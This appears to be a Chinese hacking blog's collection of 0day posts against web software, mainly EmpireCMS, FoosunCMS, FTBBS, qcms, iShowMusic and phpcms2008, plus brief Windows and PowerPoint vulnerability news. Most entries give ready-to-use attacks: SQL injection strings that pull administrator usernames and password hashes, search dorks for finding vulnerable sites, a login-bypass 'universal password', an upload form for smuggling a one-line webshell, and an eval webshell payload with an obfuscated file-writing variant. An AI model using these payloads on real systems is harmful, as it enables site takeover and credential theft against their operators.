收藏、分享这篇文章!

06150583700/aaa.asp//&CurrPath=/userfiles/06150583700
其中这个06150583700是你的userid，登录了直接可以看到，建立一个.asp目录
因为风讯浏览目录的地方也过滤了.，所以建立的子目录进不去。本地构造表单：
<form name=”FileForm” method=”post” enctype=”multipart/form-data” action=”http://www.xxx.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp”>
    <input type=”hidden” name=”AutoReName” value=”2″><br>
    <input type=”hidden” name=”Path” value=”/userfiles/06150583700/aaa.asp”>
    <input type=”file” size=”20″ name=”File1″>
    <input type=”hidden” name=”FilesNum” value=”1″>
    <input type=”submit” id=”BtnSubmit” name=”Submit” value=” 确 定 “>
    <input type=”reset” id=”ResetForm” name=”Submit3″ value=” 重 填 “>
</form>
传个夹带一句话的图片上去
恶心的地方来了，传上去的文件名是日期+时间+5位随机数（可能是4位3位2位1位，反正最大5位），这个我跟bink研究了半天，没有
办法看到-_-，用管中窥豹有个暴力猜接上传路径的功能，先在正常目录里上传个文件，卡一下本地跟远程的时间差，然后传到.asp

收藏、分享这篇文章!

帝国cms 0day

帝国cms最新0day漏洞利用方法:可以搜索inurl:e/tool/gbook/?bid=1或Powered by EmpireCMS 5.1来找有漏洞的网站,帝国cms留言本漏洞页面e/tool/gbook/?bid=1
然后在姓名处填:縗\ 注意当縗\不给用时可以使用%df\替代
然后在联系邮箱处填,1,1,1,(select concat(username,0×5f,password,0×5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
最后直接提交_前面是管理员名,中间是经过md5加密的密码.md5密码可以到http://www.cmd5.com/或http://www.xmd5.com/查询.帝国cms管理后台地址是e/admin/

收藏、分享这篇文章!

windows7 0day

windows7 首个0day被360安全中心发现,该0day属于内核级漏洞,所有windows7 rc版及以下版本都有.漏洞产生原因是gdi程序可以任意权限操作导致系统蓝屏,目前还没有补丁.

收藏、分享这篇文章!

powepoint 0day 补丁

office powerpoint 今日被爆出0day漏洞 涉及版本从2000一直到2007几乎所有版本都有这个漏洞,目前还无人发布利用工具,微软将会在5月12日发布紧急补丁,微软关于本漏洞的介绍网页http://www.microsoft.com/technet/security/advisory/969136.mspx

收藏、分享这篇文章!

收藏、分享这篇文章!

ftbbs7.1注入漏洞

Ftbbs7.1静态GBK版ftbbsmyinfo.asp文件存在注入漏洞目前0day利用方式http://127.0.0.1/ftbbsmyinfo.asp?postuserid=1%20AND%201=2%20UNION%20S%65LECT%201,ADMIN_USER,3,4,5,6,7,8,9,admin_pwd,11,12,13,14,15,16%20FR%4FM%20ft_ftbbs_admin

请使用ftbbs的用户关注它的官网安全补丁发布.

收藏、分享这篇文章!

收藏、分享这篇文章!

qcms 0day

qcms 0day漏洞如下：
1.可以下载数据库。
2.注入：
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下：
admin_name=trim(request.Form(“admin_name”))
admin_password=trim(request.Form(“admin_password”))
admin_password=md5(admin_password)
if admin_name=”" then
session(“admin_name”)=”"
%>
<SCRIPT LANGUAGE=vbscript>
<!–
msgbox(“请输入用户名!”)
window.self.location.href=”admin_login.asp”
–>
</SCRIPT>
<%
else
if admin_password=”" then
session(“admin_name”)=”"
%>
<SCRIPT LANGUAGE=vbscript>
<!–
msgbox(“请输入密码!”)
window.self.location.href=”admin_login.asp”
–>
</SCRIPT>
<%
else
sql=”select * from admin where admin_name=’”&admin_name&”‘ and admin_password=’”&admin_password&”‘”
很明显，传说的万能密码，重现江湖。

上传漏洞。
没做任何判断，也没有。
也没用权限判断。
代码就不给了，大家自己找。
后台一处
插件：fckeditor
也有上传漏洞，网上有，大家自己看
暴库：
代码如下：
<%
set conn=server.createobject(“adodb.connection”)
conn.open “driver={microsoft access driver (*.mdb)};dbq=”&server.mappath(“/db.mdb”)
%>
没任何处理

这个版本和我向作者提交漏洞的版本不一样！
这个版本没用防注入。

就这几个，简单，但很致命。

后面的这几个版本，我向作者提交了不少漏洞，基本修复，所以只有挑软柿子，给大家讲讲这个版本。

收藏、分享这篇文章!

安全

iShowMusic在error.php 12-26行复制内容到剪贴板代码:
elseif ($_POST['action']==”save”){
$cknumon && GdConfirm($gdcode);
if(empty($id)) {
Showmsg(“no”,”你还未选择歌曲呢!”,”返回重新填写”,”javascript:history.back(-1)”); exit;}
elseif(empty($_POST['user'])) {
Showmsg(“no”,”你还没写名字呢!”,”返回重新填写”,”javascript:history.back(-1)”); exit;}
else{
$user=safeconvert($user);
$line=”$user|$songname|$id|$errmsg|$timestamp|\n”;
$e=”$datadir/error.php”;
writetofile($e,$line,”a+”);
Showmsg(“yes”,”提交成功，谢谢您的支持！”,”关闭本页”,”javascript:window.close()”); exit;
}在global.php 27-34行复制内容到剪贴板代码:
foreach($_POST as $_key=>$_value){
$_POST[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_POST[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];
}
foreach($_GET as $_key=>$_value){
$_GET[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_GET[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];
}这段代码是允许在register_globals在off的情况下工作
程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.
导致失去了这段代码本来的作用.

function writetofile($file_name, $data, $method = “w”)
{
$filenum = fopen($file_name, $method);
flock($filenum, LOCK_EX);
$file_data = fwrite($filenum, $data);
fclose($filenum);
return $file_data;
}

这个函数也没有任何过滤就把$data写进去了,呵呵

hxxp://www.xxx.com/error.php?errid=1&errtitle=<?eval($_POST[wst]);?>

然后提交一下你就能获得一个shell在

hxxp://www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文

件夹改名,呵呵)

刚经群里的朋友提示,发现这段代码并没有错误复制内容到剪贴板代码:
foreach($_POST as $_key=>$_value){
$_POST[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_POST[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_POST[$_key];
}
foreach($_GET as $_key=>$_value){
$_GET[$_key]=str_replace(array(‘|’,'$’,’..’),array

(‘|’,'$’,’..’),$_GET[$_key]);
!ereg(“^\_”,$_key) && !$$_key && $$_key=$_GET[$_key];
}呵呵..虽然我在本地本地测试的时候确实没替换.
现在修改哈Ryat提供的邪恶的shellcode..嘿嘿
hxxp://www.xxx.com/error.php?errid=1&errtitle=<?fputs(fopen(chr(119).chr(111).chr(108).chr(118).chr(101).chr(122).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59).chr(63).chr(62));?>
这样你在访问一次hxxp://www.xxx.com/data/error.php后将得到hxxp://www.xxx.com/data/wolvez.php的测试文件
内容为<?phpinfo():?>lol

收藏、分享这篇文章!

安全

作者：nuke
受影响程序： phpcms2008 gbk
漏洞文件：ask/search_ajax.php
测试方法：
ask/search_ajax.php?q=s%E6′/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0×706870636D73)>52%23

收藏、分享这篇文章!